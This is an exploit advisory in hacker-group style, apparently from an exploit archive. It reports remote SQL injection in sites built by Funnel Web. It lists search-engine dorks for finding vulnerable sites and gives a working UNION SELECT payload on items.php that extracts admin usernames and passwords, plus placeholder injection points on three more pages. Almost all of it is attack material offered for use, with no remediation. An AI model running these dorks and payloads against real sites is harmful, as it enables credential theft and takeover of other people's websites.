############################### IRANIAN THE BEST HACKERS IN THE WORLD ################## #################### #################### ## ## Remote SQL injection Vulnerability ## ## Funnel Web (items.php?&cat_id) (directory.php?cid) (selected_product.php?t) (pages.php?page) ## ############################################################### ############################################################### ############################################################### ############################################################### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : Ehsan_Hp200@Hotmail.com ## ## Vendor : http://www.funnel-web.com.au/ ## ## Persian Gulf 4 Ever! ############################# ############################# ############################# ############################# ############################# ## ## Dork : "Web site design by Funnel Web" "inurl:items.php" Exploite: www.victim.com/items.php?&cat_id=-1+Union+Select+1,concat(user_id,0x3a,user_pw),1+From+admin-- Dork : "Web site design by Funnel Web" "inurl:directory.php?cid=" Exploite: www.victim.com/directory.php?cid=[SQL] Dork : "Web site design by Funnel Web" "inurl:selected_product.php?t=" Exploite: www.victim.com/selected_product.php?t=[SQL] Dork : "Web site design by Funnel Web" "inurl:pages.php?page=" Exploite: www.victim.com/pages.php?page=[SQL] ######################################################################################### SpeCial TanX To : Dj7Xpl ########################################################################################## ############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################